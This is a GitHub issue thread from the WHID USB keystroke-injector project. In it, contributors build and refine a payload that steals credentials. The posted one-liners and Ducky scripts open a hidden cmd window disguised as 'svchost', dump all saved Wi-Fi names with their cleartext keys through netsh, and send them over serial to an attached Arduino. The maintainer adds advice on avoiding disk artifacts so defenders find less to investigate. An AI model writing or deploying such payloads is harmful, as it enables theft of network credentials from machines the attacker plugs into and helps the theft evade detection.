whid-injector/WHID #47: [Suggestion] Possible Windows serial exfiltration improvement

michalmonday, 2019-07-24:
```Powershell
for /F %p in ('powershell "( Get-WmiObject Win32_SerialPort | Where { $_.Description -like '*Arduino Leonardo*' } | select -first 1 ).DeviceID"') do echo "Hello world" >\\.\%p
```
Based on:
https://batchloaf.wordpress.com/2013/02/12/simple-trick-for-sending-characters-to-a-serial-port-in-windows/
https://empegbbs.com/ubbthreads.php/topics/352223/Re:_Windows_command_to_quickly#Post352223

michalmonday, 2019-07-25:
Here's example of a one-liner that sends all saved access point names and their passwords through serial using this method.
```PowerShell
for /F %a in ('powershell "( Get-WmiObject Win32_SerialPort | Where { $_.Description -like '*Arduino Leonardo*' } | select -first 1 ).DeviceID"') do cmd /V /C "set com=%a&& for /F "tokens=2 delims=:" %s in ('netsh wlan show profiles') do for /F "tokens=2 delims=:" %p in ('netsh wlan show profiles %s key^=clear ^| findstr "Key Content"') do echo %s - %p >\\.\%a"
```
Based on: 
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/WiFi-password-Grabber-2-(Windows-10)

Instead of using files to parse the password it uses `"tokens=2 delims=:"` parameter to do it on a single line.

whid-injector, 2019-08-05:
Nice!
If you make a Pull-Request with the full payload file (example: https://github.com/whid-injector/WHID/blob/master/Payloads/WinSerialExfil.txt) I will more than happy to approve the PR.

michalmonday, 2019-08-05:
I played with it a bit and I noticed it wasn't perfect, it appeared that multiple consecutive `echo %s - %p >\\.\%a"` commands didn't work (some got lost). What fixed it was a small delay using "hacky" `echo %s - %p >\\.\%a & ping 192.0.2.2 -n 1 -w 300 > nul"` (where ping is there just for the sake of creating 300ms delay between each "echo" call). But that was ugly I think... So I changed the payload to actually create 1 file (called `p.png`) and delete it afterwards, just so all of the access point names + passwords get sent all at once.

So, here's the ducky script (was tested):
```
REM Target: Windows 10
REM Version: 1
REM Description: Opens cmd promt, hides it (resize + gray color), gets all saved access point names with their passwords and sends them through serial to Arduino (Leonardo/Pro Micro).

REM Author: Michal Borowski
REM Based on the following resources: 
REM 	Idea (Luca Bongiorni): https://github.com/whid-injector/WHID/blob/master/Payloads/WinSerialExfil.txt
REM 	Sending serial data (Ted Burke): https://batchloaf.wordpress.com/2013/02/12/simple-trick-for-sending-characters-to-a-serial-port-in-windows/
REM 	Getting serial port name (Roger): https://empegbbs.com/ubbthreads.php/topics/352223/Re:_Windows_command_to_quickly#Post352223
REM 	Wifi password grabbing (ramirovargas077, TakoTenshi): https://github.com/hak5darren/USB-Rubber-Ducky/wiki/WiFi-password-Grabber-2-(Windows-10)

GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING echo off & mode 20,1 & title svchost & color 78 & cls
ENTER
DELAY 200
STRING for /F %a in ('powershell "( Get-WmiObject Win32_SerialPort | Where { $_.Description -like '*Arduino Leonardo*' } | select -first 1 ).DeviceID"') do cmd /C "for /F "tokens=2 delims=:" %s in ('netsh wlan show profiles') do for /F "tokens=2 delims=:" %p in ('netsh wlan show profiles %s key^=clear ^| findstr "Key Content"') do echo %s -%p >> p.png" & type p.png >\\.\%a & del /f p.png & exit
ENTER
```

And here it is adapted to resemble the [WinSerialExfil.txt](https://github.com/whid-injector/WHID/blob/master/Payloads/WinSerialExfil.txt) (wasn't tested)
```
DefaultDelay:50
CustomDelay:3000
Press:131+114
CustomDelay:500
PrintLine:cmd
CustomDelay:500
PrintLine:echo off & mode 20,1 & title svchost & color 78 & cls
CustomDelay:200
PrintLine:for /F %a in ('powershell "( Get-WmiObject Win32_SerialPort | Where { $_.Description -like '*Arduino Leonardo*' } | select -first 1 ).DeviceID"') do cmd /C "for /F "tokens=2 delims=:" %s in ('netsh wlan show profiles') do for /F "tokens=2 delims=:" %p in ('netsh wlan show profiles %s key^=clear ^| findstr "Key Content"') do echo %s -%p >> p.png" & type p.png >\\.\%a & del /f p.png & exit
```

I think it would be a good idea to test the adapted version before issuing the pull request though, I'll probably do it myself later today but just in case if not then the thing is here for anyone that is willing to do that.

whid-injector, 2019-08-05:
Looks cool! 
Though, I would not touch the disk because it would leave artifacts that Blue Team can work on.
When I will have time I will try to play with your payload approach and see if we can avoid toughing the disk.

closed 2023-09-08 by whid-injector